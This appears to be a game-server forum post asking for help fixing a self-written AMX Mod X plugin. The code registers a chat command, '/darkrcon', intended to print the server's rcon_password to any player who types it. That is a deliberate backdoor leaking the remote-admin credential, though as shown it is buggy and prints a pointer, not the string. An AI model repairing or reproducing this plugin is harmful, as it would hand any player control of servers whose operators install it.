hello
i maked this plugin by my self !
but the problem is that when i say /darkrcon it show me the name of the plugin O.o
please help me to fix it !
PHP Code:
/* Plugin generated by AMXX-Studio */
#include <amxmodx>
#include <amxmisc>
#define PLUGIN "DARk PLUGIN"
#define VERSION "1.0"
#define AUTHOR "DARK"
new rcon_password
public plugin_init() {
register_plugin(PLUGIN, VERSION, AUTHOR)
register_clcmd("say /darkrcon", "rcon_show")
rcon_password=get_cvar_pointer("rcon_password")
}
public rcon_show(id)
{
client_print(id, print_chat, "By DARK: %s", rcon_password)
}